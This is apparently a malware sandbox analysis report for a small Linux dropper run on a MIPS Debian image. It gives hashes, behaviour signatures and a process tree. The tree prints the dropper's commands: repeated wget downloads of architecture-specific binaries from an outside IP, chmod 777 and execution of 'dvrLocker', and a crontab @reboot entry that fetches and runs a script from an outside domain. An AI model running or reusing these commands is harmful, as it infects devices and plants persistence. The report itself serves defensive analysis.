Analysis
-
max time kernel
150s -
max time network
140s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
27/11/2024, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsel-20240226-en
General
-
Target
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
-
Size
913B
-
MD5
c18ef2271ad912c7542293151373ffa0
-
SHA1
65fb65c17671657fc431173051fe794c6c63007d
-
SHA256
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
-
SHA512
fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 858 chmod 875 chmod 895 chmod 903 chmod 927 chmod 862 chmod 870 chmod 879 chmod 911 chmod 915 chmod 919 chmod 851 chmod 866 chmod 887 chmod 891 chmod 923 chmod 821 chmod 823 sh 883 chmod 899 chmod 907 chmod -
Executes dropped EXE 7 IoCs
ioc pid Process /tmp/lib/dvrLocker 822 dvrLocker /tmp/lib/dvrLocker 838 dvrLocker /tmp/lib/dvrLocker 852 dvrLocker /tmp/lib/dvrLocker 859 dvrLocker /tmp/lib/dvrLocker 863 dvrLocker /tmp/lib/dvrLocker 867 dvrLocker /tmp/lib/dvrLocker 871 dvrLocker -
Renames itself 1 IoCs
pid Process 822 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 217.160.70.42 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.Uw0tZs crontab -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd 822 dvrLocker -
description ioc Process File opened for reading /proc/889/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/873/status dvrLocker File opened for reading /proc/874/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/922/status dvrLocker File opened for reading /proc/924/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/852/status dvrLocker File opened for reading /proc/898/status dvrLocker File opened for reading /proc/901/status dvrLocker File opened for reading /proc/911/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/710/cmdline dvrLocker File opened for reading /proc/926/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems crontab File opened for reading /proc/863/status dvrLocker File opened for reading /proc/864/status dvrLocker File opened for reading /proc/912/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/855/status dvrLocker File opened for reading /proc/865/status dvrLocker File opened for reading /proc/886/status dvrLocker File opened for reading /proc/mounts dvrLocker File opened for reading /proc/841/status dvrLocker File opened for reading /proc/857/status dvrLocker File opened for reading /proc/902/status dvrLocker File opened for reading /proc/908/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/836/status dvrLocker File opened for reading /proc/844/status dvrLocker File opened for reading /proc/filesystems crontab File opened for reading /proc/882/status dvrLocker File opened for reading /proc/885/status dvrLocker File opened for reading /proc/916/status dvrLocker File opened for reading /proc/919/status dvrLocker File opened for reading /proc/2/cmdline dvrLocker File opened for reading /proc/881/status dvrLocker File opened for reading /proc/896/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/900/status dvrLocker File opened for reading /proc/905/status dvrLocker File opened for reading /proc/917/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/850/status dvrLocker File opened for reading /proc/861/status dvrLocker File opened for reading /proc/876/status dvrLocker File opened for reading /proc/890/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/837/status dvrLocker -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 878 wget 881 rm 906 wget 909 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/lib/dvrLocker 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Processes
-
/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown1⤵
- Writes file to tmp directory
PID:710 -
/bin/lsls -l /proc/1/exe2⤵PID:713
-
-
/bin/lsls -l /proc/10/exe2⤵PID:718
-
-
/bin/lsls -l /proc/105/exe2⤵PID:721
-
-
/bin/lsls -l /proc/11/exe2⤵PID:724
-
-
/bin/lsls -l /proc/114/exe2⤵
- Reads runtime system information
PID:727
-
-
/bin/lsls -l /proc/115/exe2⤵PID:731
-
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:734
-
-
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:737
-
-
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:738
-
-
/bin/lsls -l /proc/143/exe2⤵
- Reads runtime system information
PID:740
-
-
/bin/lsls -l /proc/148/exe2⤵PID:742
-
-
/bin/lsls -l /proc/15/exe2⤵PID:743
-
-
/bin/lsls -l /proc/16/exe2⤵PID:745
-
-
/bin/lsls -l /proc/164/exe2⤵PID:748
-
-
/bin/lsls -l /proc/17/exe2⤵PID:749
-
-
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:751
-
-
/bin/lsls -l /proc/19/exe2⤵PID:752
-
-
/bin/lsls -l /proc/2/exe2⤵PID:753
-
-
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:755
-
-
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:756
-
-
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:757
-
-
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:758
-
-
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:759
-
-
/bin/lsls -l /proc/245/exe2⤵
- Reads runtime system information
PID:760
-
-
/bin/lsls -l /proc/3/exe2⤵PID:761
-
-
/bin/lsls -l /proc/320/exe2⤵PID:762
-
-
/bin/lsls -l /proc/336/exe2⤵PID:763
-
-
/bin/lsls -l /proc/340/exe2⤵
- Reads runtime system information
PID:764
-
-
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:765
-
-
/bin/lsls -l /proc/365/exe2⤵PID:766
-
-
/bin/lsls -l /proc/366/exe2⤵PID:767
-
-
/bin/lsls -l /proc/367/exe2⤵PID:768
-
-
/bin/lsls -l /proc/37/exe2⤵PID:769
-
-
/bin/lsls -l /proc/385/exe2⤵
- Reads runtime system information
PID:770
-
-
/bin/lsls -l /proc/386/exe2⤵PID:771
-
-
/bin/lsls -l /proc/395/exe2⤵PID:772
-
-
/bin/lsls -l /proc/4/exe2⤵PID:773
-
-
/bin/lsls -l /proc/402/exe2⤵
- Reads runtime system information
PID:774
-
-
/bin/lsls -l /proc/484/exe2⤵PID:775
-
-
/bin/lsls -l /proc/497/exe2⤵PID:776
-
-
/bin/lsls -l /proc/5/exe2⤵PID:777
-
-
/bin/lsls -l /proc/526/exe2⤵
- Reads runtime system information
PID:778
-
-
/bin/lsls -l /proc/527/exe2⤵PID:779
-
-
/bin/lsls -l /proc/6/exe2⤵PID:780
-
-
/bin/lsls -l /proc/688/exe2⤵PID:781
-
-
/bin/lsls -l /proc/69/exe2⤵PID:782
-
-
/bin/lsls -l /proc/7/exe2⤵
- Reads runtime system information
PID:783
-
-
/bin/lsls -l /proc/70/exe2⤵PID:784
-
-
/bin/lsls -l /proc/702/exe2⤵
- Reads runtime system information
PID:785
-
-
/bin/lsls -l /proc/703/exe2⤵PID:786
-
-
/bin/lsls -l /proc/705/exe2⤵PID:787
-
-
/bin/lsls -l /proc/707/exe2⤵PID:788
-
-
/bin/lsls -l /proc/708/exe2⤵PID:789
-
-
/bin/lsls -l /proc/709/exe2⤵PID:790
-
-
/bin/lsls -l /proc/71/exe2⤵PID:791
-
-
/bin/lsls -l /proc/710/exe2⤵PID:792
-
-
/bin/lsls -l /proc/711/exe2⤵PID:793
-
-
/bin/lsls -l /proc/712/exe2⤵PID:794
-
-
/bin/lsls -l /proc/72/exe2⤵
- Reads runtime system information
PID:795
-
-
/bin/lsls -l /proc/73/exe2⤵PID:796
-
-
/bin/lsls -l /proc/74/exe2⤵PID:797
-
-
/bin/lsls -l /proc/76/exe2⤵PID:798
-
-
/bin/lsls -l /proc/77/exe2⤵PID:801
-
-
/bin/lsls -l /proc/79/exe2⤵PID:802
-
-
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:804
-
-
/bin/lsls -l /proc/80/exe2⤵PID:806
-
-
/bin/lsls -l /proc/82/exe2⤵PID:808
-
-
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:810
-
-
/bin/rmrm -rf /tmp/lib/2⤵PID:811
-
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:813
-
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:815
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:816
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:822 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:823 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:826
-
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:827
-
-
-
-
/bin/rmrm -rf mpsl2⤵PID:835
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:838
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:843
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm -rf arm2⤵PID:856
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:857
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm -rf arm52⤵PID:860
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:861
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm -rf ppc2⤵PID:864
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:865
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm -rf arm72⤵PID:868
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:869
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm -rf arm62⤵PID:872
-
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:873
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:874
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:875
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:876
-
-
/bin/rmrm -rf mpsl2⤵PID:877
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:879
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:880
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:882
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:883
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:884
-
-
/bin/rmrm -rf arm2⤵PID:885
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:886
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:887
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:888
-
-
/bin/rmrm -rf arm52⤵PID:889
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:890
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:891
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:892
-
-
/bin/rmrm -rf ppc2⤵PID:893
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:894
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:895
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:896
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:898
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:899
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:900
-
-
/bin/rmrm -rf arm62⤵PID:901
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:902
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:903
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:904
-
-
/bin/rmrm -rf mpsl2⤵PID:905
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:907
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:908
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:910
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:911
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:912
-
-
/bin/rmrm -rf arm2⤵PID:913
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:914
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:915
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:916
-
-
/bin/rmrm -rf arm52⤵PID:917
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:918
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:919
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:920
-
-
/bin/rmrm -rf ppc2⤵PID:921
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:922
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:923
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:924
-
-
/bin/rmrm -rf arm72⤵PID:925
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:926
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:927
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:928
-
-
/bin/rmrm -rf arm62⤵PID:929
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
306B
MD52fbaf9a94577da61ead6786557355f03
SHA109a7a8bb07b2e052e230744a7a2dfff6a649776b
SHA256f6a6bc7ee3507b8c07807574731ad14c35195252608a2223e5885e772f9bf4c1
SHA512a45c2cb4da881374a691023c8f27caa273f27ab1a533d67191a5f4cee4ef19d41f4c01084e9dfbcd5c086e9d7f2fc237f7d8d33242a84d387459bd13dcd16ba3